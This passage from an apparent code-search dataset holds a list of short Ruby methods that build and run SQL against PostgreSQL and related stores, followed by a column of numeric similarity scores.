"def create_function(function_name, returning, definition, options = {})\n\n function_name = full_function_name(function_name, options)\n language = options[:language] || 'plpgsql'\n replace = if options[:replace] == false\n ''\n else\n 'OR REPLACE '\n end\n volatility = case options[:volatility]\n when :volatile, :stable, :immutable\n \"\\n #{options[:volatility].to_s.upcase}\"\n else\n \"\"\n end\n\n sql = <<-SQL.gsub(/^[ ]{6}/, \"\")\n CREATE #{replace}FUNCTION #{function_name}\n RETURNS #{returning}\n LANGUAGE #{language}#{volatility}\n AS $function$\n #{definition.strip}\n $function$\n SQL\n\n execute(sql)\n end",
"def introduction_with_language(name, language)\n puts \"Hi, my name is #{name} and I am learning to program in #{language}.\"\nend",
"def base_script\n base_language.standard_script\n end",
"def run_sql(sql)\n db = PG.connect(:dbname => 'movies', :host => 'localhost')\n result = db.exec(sql)\n db.close\n result\n end",
"def to_maql_create\n maql = \"# Create the '#{self.title}' data set\\n\"\n maql += \"CREATE DATASET {#{self.identifier}} VISUAL (TITLE \\\"#{self.title}\\\");\\n\\n\"\n [ attributes, facts, { 1 => @connection_point } ].each do |objects|\n objects.values.each do |obj|\n maql += \"# Create '#{obj.title}' and add it to the '#{self.title}' data set.\\n\"\n maql += obj.to_maql_create\n maql += \"ALTER DATASET {#{self.identifier}} ADD {#{obj.identifier}};\\n\\n\"\n end\n end\n\n labels.each do |label|\n maql += \"# Creating Labels\\n\"\n maql += label.to_maql_create\n end\n\n references.values.each do |ref|\n maql += \"# Creating references\\n\"\n maql += ref.to_maql_create\n end\n\n folders_maql = \"# Create folders\\n\"\n (folders[:attributes].values + folders[:facts].values).each { |folder| folders_maql += folder.to_maql_create }\n folders_maql + \"\\n\" + maql + \"SYNCHRONIZE {#{identifier}};\\n\"\n end",
"def define_python_methods\r\n @p.Execute(\"\r\ndef foo(x):\r\n return x + x\r\n\r\ndef bar(x):\r\n return x * x\r\n\"\r\n )\r\nend",
"def student_favourite_programming_language(language)\n return \"I love #{language}\"\n end",
"def compile_to_ruby\n statements.collect { |s| s.compile_to_ruby }.join(\"\\n\")\n end",
"def gtprogram\n stmts\nend",
"def generate_sql_query(stored_procedure_call, *attributes)\n sql_query = 'select * from '\n sql_query << stored_procedure_call << '('\n\n sql_query << attributes.map { |attribute|\n if attribute.kind_of?(Fixnum) || attribute.kind_of?(Float) || attribute.kind_of?(TrueClass) || \n attribute.kind_of?(FalseClass)\n attribute\n elsif attribute.nil?\n \"null\"\n else\n \"'\" + escape_quotes(attribute) + \"'\"\n end\n }.join(', ')\n\n sql_query << ');'\n end",
"def run_sql(sql)\n conn = PG.connect(dbname: \"memetube\", host: \"localhost\")\n begin\n result = conn.exec(sql)\n ensure\n conn.close\n end\n result\nend",
"def introduction_with_language(name, language)\n puts \"Hi, my name is #{name} and I am learning to program in #{language}.\"\nend",
"def run_sql(sql)\n db = PG.connect(dbname: 'goodfoodhunting')\n results = db.exec(sql)\n db.close\n results\nend",
"def sql_string\n self\n end",
"def run_sql(sql)\n conn = PG.connect(dbname: 'movies')\n result = conn.exec(sql)\n conn.close\n result\nend"
] |
[
"0.61669266",
"0.6121147",
"0.6121147",
"0.59831965",
"0.59831965",
"0.58226854",
"0.57331324",
"0.5722036",
"0.5647145",
"0.56217813",
"0.5590047",
"0.55899316",
"0.55826867",
"0.557583",
"0.55719095",
"0.5558236",
"0.55524683",
"0.5549",
"0.55081385",
"0.54753685",
"0.5455137",
"0.5428022",
"0.5413245",
"0.5391539",
"0.5378268",
"0.5374878",
"0.53664076",
"0.533763",
"0.5328607",
"0.5327648",
"0.53021234",
"0.52994627",
"0.5294819",
"0.5290663",
"0.5284321",
"0.528259",
"0.5243016",
"0.52396697",
"0.5232828",
"0.5229618",
"0.5225559",
"0.5225299",
"0.52191126",
"0.52077204",
"0.52001804",
"0.51964325",
"0.51829576",
"0.51828223",
"0.51786935",
"0.5175131",
"0.5167527",
"0.5157243",
"0.5139798",
"0.5122884",
"0.5120436",
"0.510454",
"0.5084944",
"0.50809807",
"0.50765556",
"0.50758827",
"0.5059281",
"0.5051089",
"0.50400156",
"0.5036784",
"0.5032889",
"0.5026841",
"0.5024534",
"0.5012896",
"0.500801",
"0.50050366",
"0.5003458",
"0.5003102",
"0.50008935",
"0.49943995",
"0.4994132",
"0.4983446",
"0.49815813",
"0.49790588",
"0.49764186",
"0.4969598",
"0.49638078",
"0.49629033",
"0.49572885",
"0.49519917",
"0.49501824",
"0.49490774",
"0.49452156",
"0.49397933",
"0.49365124",
"0.49355924",
"0.49331513",
"0.4930586",
"0.4927874",
"0.49262992",
"0.4922545",
"0.49167097",
"0.4909797",
"0.49031073",
"0.4898908",
"0.48988277"
] |
0.71067977
|
0
|
Create a partition of another table; used when create_table is called with the :partition_of option.
|
def create_partition_of_table_from_generator(name, generator, options)
  execute_ddl(create_partition_of_table_sql(name, generator, options))
end
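
A hypothetical invocation path, pieced together from the related snippets below (the table names are made up; `from`/`to` mirror the range-partitioning methods of the `CreatePartitionOfTableGenerator` shown in the neighboring entries):

# Assumed: DB is a Sequel PostgreSQL Database object; create_table routes
# the :partition_of option to create_partition_of_table_from_generator.
DB.create_table(:events_2020, :partition_of => :events) do
  from 2020
  to 2021
end
# Emits roughly:
#   CREATE TABLE events_2020 PARTITION OF events
#   FOR VALUES FROM (2020) TO (2021)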
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create_table(name, options=OPTS, &block)\n if options[:partition_of]\n create_partition_of_table_from_generator(name, CreatePartitionOfTableGenerator.new(&block), options)\n return\n end\n\n super\n end",
"def create_range_partition(table_name, options, &block)\n raise ArgumentError, 'partition_key must be defined' if options[:partition_key].nil?\n\n Tablature.database.create_range_partition(table_name, options, &block)\n end",
"def create_partition_of_table_sql(name, generator, options)\n sql = create_table_prefix_sql(name, options).dup\n\n sql << \" PARTITION OF #{quote_schema_table(options[:partition_of])}\"\n\n case generator.partition_type\n when :range\n from, to = generator.range\n sql << \" FOR VALUES FROM #{literal(from)} TO #{literal(to)}\"\n when :list\n sql << \" FOR VALUES IN #{literal(generator.list)}\"\n when :hash\n mod, remainder = generator.hash_values\n sql << \" FOR VALUES WITH (MODULUS #{literal(mod)}, REMAINDER #{literal(remainder)})\"\n else # when :default\n sql << \" DEFAULT\"\n end\n\n sql << create_table_suffix_sql(name, options)\n\n sql\n end",
"def create_partitions\n info(\"Creating disk with #{PARTITION_TABLE_TYPE} parition table\")\n execute!(\"parted -s #{@dev} mklabel #{PARTITION_TABLE_TYPE}\")\n\n start_size = FIRST_PARTITION_OFFSET\n end_size = FIRST_PARTITION_OFFSET\n\n unspec_part = nil\n\n # Create the partitions\n @partition_layout.each_with_index do |part, index|\n # Deal with any \"open ended\" partitions last\n if not part.size_mb.is_a?(Integer)\n unspec_part = part\n next\n end\n\n start_size = end_size\n end_size += part.size_mb\n\n info(\"Creating partition #{part.label} (#{part.fs}, #{part.size_mb}MiB)\")\n execute!(\"parted #{@dev} mkpart #{part.label} #{part.fs} #{start_size}MiB #{end_size}MiB\")\n\n (part.flags || {}).each_pair { |k, v|\n info(\"Setting partition flag #{k} to #{v}\")\n execute!(\"parted #{@dev} set #{index + 1} #{k} #{v}\")\n }\n\n label_path = \"/dev/disk/by-partlabel/#{part.label}\"\n self.wait_for_device(label_path)\n\n if not part.fs\n warn(\"No filesystem specified for #{part.label}. Skipping FS\")\n else\n create_filesystem(part.fs, label_path, part.label)\n end\n\n if part.lvm\n notice(\"Setting up LVM on #{part.label}\")\n setup_lvm_on_partition(part)\n end\n end\n\n # Deal with any \"open ended\" partitions (that have an unspecified size_mb)\n if unspec_part\n part = unspec_part\n info(\"Creating partition #{part.label} (#{part.fs}, 100% remaining)\")\n execute!(\"parted #{@dev} mkpart #{part.label} #{part.fs} #{end_size}MiB 100%\")\n\n (part.flags || {}).each_pair { |k, v|\n info(\"Setting partition flag #{k} to #{v}\")\n execute!(\"parted #{@dev} set #{@partition_layout.length} #{k} #{v}\")\n }\n\n label_path = \"/dev/disk/by-partlabel/#{part.label}\"\n self.wait_for_device(label_path)\n create_filesystem(part.fs, label_path, part.label) if part.fs\n\n if part.lvm\n notice(\"Setting up LVM on #{part.label}\")\n setup_lvm_on_partition(part)\n end\n end\n\n nil\n end",
"def CreatePartition(disk, device, ptype, id, start, len, mby)\n Builtins.y2milestone(\n \"CreatePartition disk:%1 device:%2 ptype:%3 id:%4 start:%5 len:%6 mby:%7\",\n disk,\n device,\n ptype,\n id,\n start,\n len,\n mby\n )\n pt = fromSymbol(@conv_ptype, ptype)\n Builtins.y2milestone(\"CreatePartition type:%1 pt:%2\", ptype, pt)\n ret, cdev = @sint.createPartition(disk, pt, start, len)\n cdev = \"\" if ret<0\n if device != cdev\n Builtins.y2error(\"CreatePartition device:%1 cdev:%2\", device, cdev)\n end\n Builtins.y2error(\"CreatePartition ret %1\", ret) if ret<0\n ret = @sint.changePartitionId(device, id)\n Builtins.y2error(\"CreatePartition ret %1\", ret) if ret<0\n tmp = fromSymbol(@conv_mountby, mby)\n @sint.changeMountBy(device, tmp)\n Builtins.y2milestone(\"CreatePartition sint ret:%1\", ret)\n UpdateTargetMap()\n ret == 0\n end",
"def create_partition device, partition_type = 'primary', start_unit, end_unit\n command = 'parted'\n params = \"#{device.path} -s -a optimal unit MB mkpart #{partition_type} ext3 #{start_unit} -- #{end_unit}\"\n parted = CommandsExecutor.new command, params\n parted.execute\n raise \"Command execution error: #{parted.stderr.read}\" if not parted.success?\n probe_kernal device\n end",
"def addPartition(ptStr)\n pts_array = ptStr.split(',')\n sqlstr = \"ALTER TABLE \" + @mProjectName + \".\" + @mTableName\n sqlstr = sqlstr + \" ADD IF NOT EXISTS\" + \" PARTITION (\"\n pts_array.each { |pt|\n ptkv = pt.split('=')\n if ptkv.size != 2\n raise \"invalid partition spec\" + pt\n end\n sqlstr += ptkv[0] + '=' + \"'\" + ptkv[1] + \"'\" + ','\n }\n sqlstr = sqlstr[0..-2] + \");\"\n taskName = \"SQLAddPartitionTask\"\n runSQL(taskName, sqlstr)\n end",
"def create_partition_to_fill_disk(disk)\n # @disk.create_partition('primary', '100%')\n disk.create_partition_table # LinuxAdmin::Disk.create_partition has this already...\n AwesomeSpawn.run!(\"parted -s #{disk.path} mkpart primary 0% 100%\")\n\n # FIXME: Refetch the disk after creating the partition\n disk = LinuxAdmin::Disk.local.find { |d| d.path == disk.path }\n disk.partitions.first\n end",
"def create_table?(name, options=OPTS, &block)\n if options[:partition_of]\n create_table(name, options.merge!(:if_not_exists=>true), &block)\n return\n end\n\n super\n end",
"def create_partition(size = nil, type = Partition.PartitionType[:TYPE_PRIMARY])\n DiskUtils.create_partition self, size[:start_block], size[:end_block]\n partitions = Device.find(self).partitions\n return partitions.last\n end",
"def add_partition_key(name, type)\n PartitionKey.new(name, type(type)).tap do |column|\n @partition_key_columns << add_column(column)\n end\n end",
"def create\n begin\n # Set the partition (/dev/sdb1), device (/dev/sdb) and alignment (optimal,minimal,none etc.) variables\n partition= resource[:name]\n device=partition[0,(partition.length-1)]\n alignment= resource[:alignment]\n\n # Now we can create the partition\n partitions = parted('-a', resource[:alignment],'--script',device,'mklabel',resource[:part_label],'mkpart', resource[:part_type],resource[:fs_type],resource[:p_begin],resource[:p_end])\n rescue Puppet::ExecutionFailure => e\n false\n end\n end",
"def addPartition(ptStr)\n @mOdpsTable.addPartition(ptStr)\n end",
"def create(key_hash)\n # TODO: Raise if a key missing\n @model.transaction do\n partition = partition_class.create!(key_hash)\n @keys.create_partition_tables(@model, :key_hash => key_hash)\n # TODO: Indexes\n partition\n end\n end",
"def partition_type\n raise Error, \"Unable to determine partition type, multiple different partitioning methods called\" if [@from || @to, @list, @modulus || @remainder, @default].compact.length > 1\n\n if @from || @to\n raise Error, \"must call both from and to when creating a partition of a table if calling either\" unless @from && @to\n :range\n elsif @in\n :list\n elsif @modulus || @remainder\n raise Error, \"must call both modulus and remainder when creating a partition of a table if calling either\" unless @modulus && @remainder\n :hash\n elsif @default\n :default\n else\n raise Error, \"unable to determine partition type, no partitioning methods called\"\n end\n end",
"def create_range_partition_of(parent_table_name, options)\n if (options[:range_start].nil? || options[:range_end].nil?) && options[:default].blank?\n raise ArgumentError, 'range_start and range_end or default must be defined'\n end\n\n Tablature.database.create_range_partition_of(parent_table_name, options)\n end",
"def create_list_partition_of(parent_table_name, options)\n if options[:values].blank? && options[:default].blank?\n raise ArgumentError, 'values or default must be defined'\n end\n\n Tablature.database.create_list_partition_of(parent_table_name, options)\n end",
"def create_side_table\n RailsRedshiftReplicator.connection.exec \"CREATE TABLE #{temporary_table_name} (LIKE #{replication.target_table})\"\n end",
"def add_partition_to_node( tp, node )\n\n @nodes_lists_replicas[node][tp] = ''\n @partitions_lists[tp]['replicas'] ||= {}\n @partitions_lists[tp]['replicas'][node] = ''\n end",
"def partition(partition_key)\n state_depth_must_be(States::RELATION)\n if @current_relation.partitions.include?(partition_key)\n raise \"duplicate partition key #{partition_key}\"\n end\n @current_relation.partitions << partition_key\n end",
"def create_with_partition(partition)\n NicView.new(fqdd.gsub(/[-]\\d+$/, \"-#{partition}\"))\n end",
"def set_partition\n @partition = Partition.find(params[:id])\n end",
"def partition\n PredicatePartition.new(predicate, operand.left.header, operand.right.header)\n end",
"def partitioned_tables\n PartitionedTables.new(connection).all\n end",
"def partition!(id)\n partition(id) || ErrorCode[:unknown_topic_or_partition].raise\n end",
"def add!(partition, dirty = false)\n if @list[partition.name].nil?\n @list[partition.name] = partition\n else\n @list[partition.name].merge!(partition, simulate = false, dirty)\n end\n self\n end",
"def attach_to_range_partition(parent_table_name, options)\n raise ArgumentError, 'name must be defined' if options[:name].blank?\n if (options[:range_start].nil? || options[:range_end].nil?) && options[:default].blank?\n raise ArgumentError, 'range_start and range_end or default must be defined'\n end\n\n Tablature.database.attach_to_range_partition(parent_table_name, options)\n end",
"def partition_device\n Souffle::Log.info \"#{@node.log_prefix} Partitioning the device...\"\n provider.partition(@node)\n end",
"def partition_for!(key)\n if leader_available?\n # Use the configured partitioner\n partition_id = partitioner.call(key, available_partitions.count, partitions.count)\n partition!(partition_id)\n else\n error_code.raise\n end\n end",
"def create_blob_table(name, shard_count = 5, replicas = 0)\n stmt = %{CREATE BLOB TABLE \"#{name}\" CLUSTERED INTO ? SHARDS WITH (number_of_replicas=?)}\n execute stmt, [shard_count, replicas]\n end",
"def create_table_with_inherits(table_name, options = {}, &block)\n options[:primary_key] = \"#{options[:inherits]}_id\" if options[:inherits]\n\n create_table_without_inherits(table_name, options) do |table_defintion|\n yield table_defintion \n end \n end",
"def partition_list()\nend",
"def create_table!(*args, &block)\n drop_table?\n create_table(*args, &block)\n end",
"def partition\n return enum_for(:partition) if not block_given?\n a,b = super\n [self.class.new(a), self.class.new(b)].freeze\n end",
"def tnTableCreation(tableName)\n pk_list = @pkList.join(',')\n pk_list = \"#{pk_list},branch_name,node_name\"\n q = QueryBuilder.create_tbl(tableName, pk_list, \"select #{@pkSelect}, 0 as test_id,''::varchar(30) as node_name, ''::varchar(30) as branch_name, ''::varchar(5) as type from #{@fTable} f where 1 = 0\")\n # pp q\n DBConn.exec(q)\n\n # q=\"ALTER TABLE #{tableName} add column test_id int, add column node_name varchar(30), add column branch_name varchar(30), add column type varchar(5);\"\n # DBConn.exec(q)\n # pk=@pkList.join(',')\n # # add index\n # q=\"create index ix_#{tableName}t on #{tableName} (#{pk},branch_name);\"\n # pp q\n # DBConn.exec(q)\n end",
"def attach_to_list_partition(parent_table_name, options)\n raise ArgumentError, 'name must be defined' if options[:name].blank?\n\n Tablature.database.attach_to_list_partition(parent_table_name, options)\n end",
"def create_table!(name, &block)\n drop_table(name) rescue nil\n create_table(name, &block)\n end",
"def create_slice(col_name, col_value)\n ds = @data_source.create_sliced_table(col_name, col_value)\n dsp = self.class.new(ds.name, ds)\n def dsp.release; @data_source.release end\n dsp\n end",
"def create_tables\n x = 1\n table_count = (all_guests.length / table_size_limit.to_f).ceil\n while x <= table_count\n Table.create(table_number: x, table_size_limit: table_size_limit, event_id: id)\n x += 1\n end\n end",
"def add_concurrent_partitioned_foreign_key(source, target, column:, on_delete: :cascade, name: nil)\n assert_not_in_transaction_block(scope: ERROR_SCOPE)\n\n partition_options = {\n column: column,\n on_delete: on_delete,\n\n # We'll use the same FK name for all partitions and match it to\n # the name used for the partitioned table to follow the convention\n # used by PostgreSQL when adding FKs to new partitions\n name: name.presence || concurrent_partitioned_foreign_key_name(source, column),\n\n # Force the FK validation to true for partitions (and the partitioned table)\n validate: true\n }\n\n if foreign_key_exists?(source, target, **partition_options)\n warning_message = \"Foreign key not created because it exists already \" \\\n \"(this may be due to an aborted migration or similar): \" \\\n \"source: #{source}, target: #{target}, column: #{partition_options[:column]}, \"\\\n \"name: #{partition_options[:name]}, on_delete: #{partition_options[:on_delete]}\"\n\n Gitlab::AppLogger.warn warning_message\n\n return\n end\n\n partitioned_table = find_partitioned_table(source)\n\n partitioned_table.postgres_partitions.order(:name).each do |partition|\n add_concurrent_foreign_key(partition.identifier, target, **partition_options)\n end\n\n with_lock_retries do\n add_foreign_key(source, target, **partition_options)\n end\n end",
"def partitions_to_append_by_ts_range(partition_start_timestamp, end_timestamp, partition_size_unit, partition_size)\n if partition_size_unit.nil? || !VALID_PARTITION_SIZE_UNITS.include?(partition_size_unit)\n _raise_arg_err \"partition_size_unit must be one of: #{VALID_PARTITION_SIZE_UNITS.inspect}\"\n end\n\n _validate_positive_fixnum(:partition_size, partition_size)\n _validate_positive_fixnum(:partition_start_timestamp, partition_start_timestamp)\n _validate_positive_fixnum(:end_timestamp, end_timestamp)\n\n timestamp = partition_start_timestamp\n\n partitions_to_append = {}\n while timestamp < end_timestamp\n timestamp = @tuc.advance(timestamp, partition_size_unit, partition_size)\n\n partition_name = name_from_timestamp(timestamp)\n partitions_to_append[partition_name] = timestamp\n end\n\n partitions_to_append\n end",
"def partitions_to_append(partition_start_timestamp, partition_size_unit, partition_size, days_into_future)\n _validate_positive_fixnum(:days_into_future, days_into_future)\n\n end_timestamp = @tuc.advance(current_timestamp, :days, days_into_future)\n partitions_to_append_by_ts_range(partition_start_timestamp, end_timestamp, partition_size_unit, partition_size)\n end",
"def create_table(*params)\n connection.create_table(*params) {}\n end",
"def list_partitions(table_name, params = {})\n all_params = approved_tables.smash(table_name, params)\n validation.validate_parameters(all_params)\n partitions(all_params)\n end",
"def setPartitionType(settings)\n settings = deep_copy(settings)\n tm = Storage.GetTargetMap\n settings = Builtins.maplist(settings) do |d|\n if Ops.get_symbol(d, \"type\", :x) == :CT_DISK\n mp = Ops.get_integer(\n tm,\n [Ops.get_string(d, \"device\", \"xxx\"), \"max_primary\"],\n 0\n )\n if Ops.greater_than(mp, 0)\n Ops.set(\n d,\n \"partitions\",\n Builtins.maplist(Ops.get_list(d, \"partitions\", [])) do |pe|\n if Builtins.haskey(pe, \"partition_nr\") &&\n !Builtins.haskey(pe, \"partition_type\") &&\n Ops.less_or_equal(\n Ops.get_integer(pe, \"partition_nr\", -1),\n mp\n )\n Ops.set(pe, \"partition_type\", \"primary\")\n end\n deep_copy(pe)\n end\n )\n end\n end\n deep_copy(d)\n end\n Builtins.y2milestone(\"after setPartitionType = %1\", settings)\n deep_copy(settings)\n end",
"def create_table\n raise \"Need to implement abstract method.\" \n end",
"def onepartition2fstab(part, other_nr)\n part = deep_copy(part)\n Builtins.y2milestone(\"onepartition2fstab part=%1\", part)\n if Ops.get_boolean(part, \"delete\", false) ||\n Ops.get_symbol(part, \"type\", :unknown) == :extended ||\n Builtins.contains(\n [:lvm, :sw_raid, :evms],\n Ops.get_symbol(part, \"type\", :unknown)\n ) &&\n Builtins.size(Ops.get_string(part, \"mount\", \"\")) == 0 ||\n Ops.get_symbol(part, \"enc_type\", :none) != :none &&\n !Ops.get_boolean(part, \"noauto\", false) ||\n !IsUsedBy(part) ||\n Builtins.contains(\n [\n Partitions.fsid_prep_chrp_boot,\n Partitions.fsid_lvm,\n Partitions.fsid_raid\n ],\n Ops.get_integer(part, \"fsid\", 0)\n ) &&\n Builtins.size(Ops.get_string(part, \"mount\", \"\")) == 0\n return {}\n end\n\n spec = Ops.get_string(part, \"device\", \"\")\n if Ops.get_symbol(part, \"mountby\", :device) == :label &&\n Ops.greater_than(Builtins.size(Ops.get_string(part, \"label\", \"\")), 0)\n spec = Builtins.sformat(\"LABEL=%1\", Ops.get_string(part, \"label\", \"\"))\n elsif Ops.get_symbol(part, \"mountby\", :device) == :uuid &&\n Ops.greater_than(Builtins.size(Ops.get_string(part, \"uuid\", \"\")), 0)\n spec = Builtins.sformat(\"UUID=%1\", Ops.get_string(part, \"uuid\", \"\"))\n end\n Builtins.y2debug(\"onepartition2fstab spec=%1\", spec)\n mount_point = Ops.get_string(part, \"mount\", \"\")\n fsid = Ops.get_integer(part, \"fsid\", 0)\n\n used_fs = Ops.get_symbol(part, \"used_fs\", :ext2)\n format = Ops.get_boolean(part, \"format\", false)\n\n vfstype = \"unknown\" # keep \"unknown\", used again below\n freq = 0\n passno = 0\n mntops = Ops.get_string(part, \"fstopt\", \"\")\n\n if mount_point == \"swap\"\n vfstype = \"swap\"\n if Builtins.isempty(mntops)\n mntops = Ops.get_string(\n FileSystems.GetFstabDefaultMap(\"swap\"),\n \"mntops\",\n \"\"\n )\n end\n passno = 0\n elsif fsid == Partitions.fsid_native || fsid == Partitions.fsid_lvm ||\n Ops.get_symbol(part, \"type\", :unknown) == :evms &&\n Ops.get_symbol(part, \"detected_fs\", :none) != :unknown\n vfstype = FileSystems.GetMountString(used_fs, format ? 
\"ext2\" : \"auto\")\n\n freq = 1\n if mount_point == \"/\"\n passno = 1\n elsif mount_point != \"\"\n passno = 2\n elsif Stage.initial && !Arch.s390\n mount_point = Ops.add(\"/data\", other_nr.value)\n # Don't mount and fsck this filesystem during boot, its\n # state is unknown.\n mntops = \"noauto,user\"\n vfstype = \"auto\"\n freq = 0\n passno = 0\n other_nr.value = Ops.add(other_nr.value, 1)\n Builtins.y2milestone(\"TT add MountPoint %1\", mount_point)\n end\n elsif (Arch.i386 || Arch.ia64 || Arch.x86_64) &&\n Ops.greater_than(Builtins.size(mount_point), 0) &&\n (used_fs == :vfat || used_fs == :ntfs) &&\n (Builtins.contains(\n Builtins.union(\n Builtins.union(\n Partitions.fsid_dostypes,\n Partitions.fsid_ntfstypes\n ),\n Partitions.fsid_wintypes\n ),\n fsid\n ) ||\n fsid == Partitions.fsid_gpt_boot)\n freq = 0\n passno = 0\n lower_point = Builtins.tolower(mount_point)\n if lower_point != \"\" && mount_point != lower_point\n lower_point = PathToDestdir(lower_point)\n Builtins.y2milestone(\n \"symlink %1 -> %2\",\n Builtins.substring(\n mount_point,\n Ops.add(Builtins.findlastof(mount_point, \"/\"), 1)\n ),\n lower_point\n )\n SCR.Execute(\n path(\".target.symlink\"),\n Builtins.substring(\n mount_point,\n Ops.add(Builtins.findlastof(mount_point, \"/\"), 1)\n ),\n lower_point\n )\n end\n vfstype = FileSystems.GetMountString(used_fs, \"auto\")\n elsif (Arch.sparc || Arch.alpha) &&\n Builtins.contains(Partitions.fsid_skipped, fsid)\n return {} # skip \"whole disk\" partition\n else\n return {} # unknown type\n end\n if Ops.get_symbol(part, \"detected_fs\", :unknown) == :unknown ||\n Ops.get_boolean(part, \"noauto\", false)\n passno = 0\n end\n\n ret = {\n \"spec\" => spec,\n \"mount\" => mount_point,\n \"vfstype\" => vfstype,\n \"mntops\" => mntops,\n \"freq\" => freq,\n \"device\" => Ops.get_string(part, \"device\", \"\"),\n \"passno\" => passno\n }\n\n if Builtins.size(Ops.get_string(ret, \"mntops\", \"\")) == 0\n Ops.set(ret, \"mntops\", \"defaults\")\n end\n\n Builtins.y2milestone(\"onepartition2fstab ret=%1\", ret)\n deep_copy(ret)\n end",
"def SetFormatPartitions(fstabpart)\n fstabpart = deep_copy(fstabpart)\n # All storage devices\n target_map = Storage.GetTargetMap\n\n # all activated\n tmp = Builtins.filter(RootPart.GetActivated) do |e|\n Ops.get_string(e, :type, \"\") == \"mount\" ||\n Ops.get_string(e, :type, \"\") == \"swap\"\n end\n\n Builtins.foreach(tmp) do |e|\n mntpt = Ops.get_string(e, :type, \"\") == \"swap\" ?\n \"swap\" :\n Ops.get_string(e, :mntpt, \"\")\n part = Ops.get_string(e, :device, \"\")\n p = {}\n Builtins.foreach(fstabpart) do |pp|\n # mountpoint matches\n if Ops.get_string(pp, \"mount\", \"\") == mntpt\n p = deep_copy(pp)\n raise Break\n end\n end\n mount_options = \"\"\n Builtins.foreach(Storage.ReadFstab(Installation.destdir)) do |entry|\n if Ops.get_string(entry, \"file\", \"\") == mntpt\n mount_options = Ops.get_string(entry, \"mntops\", \"\")\n raise Break\n end\n end\n target_map = Storage.SetPartitionData(target_map, part, \"mount\", mntpt)\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"format\",\n Ops.get_boolean(p, \"format\", false)\n )\n target_map = Storage.SetPartitionData(target_map, part, \"delete\", false)\n target_map = Storage.SetPartitionData(target_map, part, \"create\", false)\n if Builtins.haskey(p, \"filesystem\")\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"filesystem\",\n Ops.get_symbol(p, \"filesystem\", :ext4)\n )\n end\n if Ops.greater_than(Builtins.size(mount_options), 0) &&\n !Builtins.haskey(p, \"fstopt\")\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"fstopt\",\n mount_options\n )\n end\n if Builtins.haskey(p, \"fstopt\")\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"fstopt\",\n Ops.get_string(p, \"fstopt\", \"\")\n )\n end\n if Builtins.haskey(p, \"mountby\")\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"mountby\",\n Ops.get_symbol(p, \"mountby\", :device)\n )\n end\n end\n\n Storage.SetTargetMap(target_map)\n true\n end",
"def create_part_of_path(path)\n begin\n @zk.create(path, \"\".to_java_bytes, default_acl, default_mode)\n rescue\n puts \"#{$!}\"\n end\n end",
"def partitions( partition_count, &proc )\n Enumerable.partition_sizes( self.size, partition_count ) do |partition|\n partitioned_collection = []\n consumed_so_far = 0\n partition.each do |partition_size|\n partitioned_collection << self[ consumed_so_far, partition_size ]\n consumed_so_far += partition_size\n end\n yield partitioned_collection\n end\n end",
"def create_backup instance_id:, cluster_id:, backup_id:, source_table_id:, expire_time:\n backup = Google::Cloud::Bigtable::Admin::V2::Backup.new \\\n source_table: table_path(instance_id, source_table_id), expire_time: expire_time\n tables.create_backup parent: cluster_path(instance_id, cluster_id), backup_id: backup_id, backup: backup\n end",
"def create_prejoined_fact_table(options={})\r\n connection.transaction {\r\n drop_prejoin_fact_table\r\n\r\n connection.create_table(prejoined_table_name, :id => false) do |t|\r\n # get all columns except the foreign_key columns for prejoined dimensions\r\n columns.each do |c|\r\n t.column(c.name, c.type) unless excluded_foreign_key_names.include?(c.name)\r\n end\r\n #prejoined_columns\r\n prejoined_fields.each_pair do |key, value|\r\n dclass = dimension_class(key)\r\n dclass.columns.each do |c|\r\n t.column(c.name, c.type) if value.include?(c.name.to_sym) \r\n end\r\n end\r\n end\r\n }\r\n end",
"def start\n super\n unless @account_name.nil? || @access_key.nil?\n @table_client = Azure::Storage::Table::TableService.create(storage_account_name: @account_name,storage_access_key:@access_key)\n end\n\n begin\n @table_client.create_table(@table) if @create_table_if_not_exists && !table_exists?(@table)\n rescue Exception => e\n log.error e\n exit!\n end\n end",
"def write(table,data,partition_key=nil)\n\n ## Get table schema...\n schema = get_table_schema(table)\n\n if schema == nil\n raise \"Scheme does not exist for table name ='#{table}'\"\n end\n\n ## Ensure that the keys in the passed data are symbols (this is what's expected)\n data.keys.each do |key|\n if(key.is_a?(Symbol) == false)\n raise \"Data key #{key} is not a symbol!\"\n # TODO: CONVERT string keys to symbols instead of raising\n end\n end\n\n intersection = schema[:columns].keys & data.keys\n\n ## Validate no data keys are passed that are not in table schema\n data.keys.each do |key|\n if(intersection.include?(key) == false)\n raise \"Data key #{key} is not in schema for #{table} table!!\"\n end\n end\n\n ## Validate that columns are not null\n schema[:columns].each do |column_name,column|\n if(column.keys.include?(:constraint) == true && column[:constraint] == \"not null\" && intersection.include?(column_name) == false)\n raise \"Column #{column_name} is missing from passed data\"\n end\n end\n\n ## Validate column types\n schema[:columns].each do |column_name,column|\n if(intersection.include?(column_name) == true)\n\n value = data[column_name.to_sym]\n column_type = column[:type]\n\n if column_type['('] != nil\n type_name = column_type[/(.*)\\(.*/,1]\n else\n type_name = column_type\n end\n\n type_name_downcased = type_name.downcase\n\n if @valid_data_types.include? type_name_downcased\n type_name_check_function = \"check_#{type_name_downcased.gsub(' ','_')}\".to_sym\n data[column_name.to_sym] = @data_types.send(type_name_check_function,value,column_type,column_name)\n else\n raise \"Invalid data type #{type_name}. Valid types [#{@valid_data_types.join(\",\")}]\"\n end\n end\n end\n\n ## Serialize as json, we load the data as JSON into redshift\n data_string=data.to_json\n\n ## Write the serialized data string to the broker\n partition_key = partition_key || rand(100).to_s\n stream_name = @broker.stream_name(table)\n result = @broker.stream_write(stream_name, data_string, partition_key)\n\n return result\n end",
"def create(structure_, data_={})\n Table.new(structure_, data_)\n end",
"def partition(arr, n)\n\nend",
"def insert_table dataset_id, new_table_gapi\n execute { service.insert_table @project, dataset_id, new_table_gapi }\n end",
"def ___create_tbl(tbl)\n return if internal('tables').split(' ').include?(tbl.tid)\n @que.push tbl.create\n verbose { \"'#{tbl.tid}' is created\" }\n end",
"def createTaskTable\n @Handle.execute( @TaskSchema ) \n end",
"def dynamic_partition(data, partitions, num_partitions, name: nil)\n result = _op(:dynamic_partition, data, partitions, num_partitions: num_partitions, name: nil)\n num_partitions.times.map do |index|\n result[index]\n end\n end",
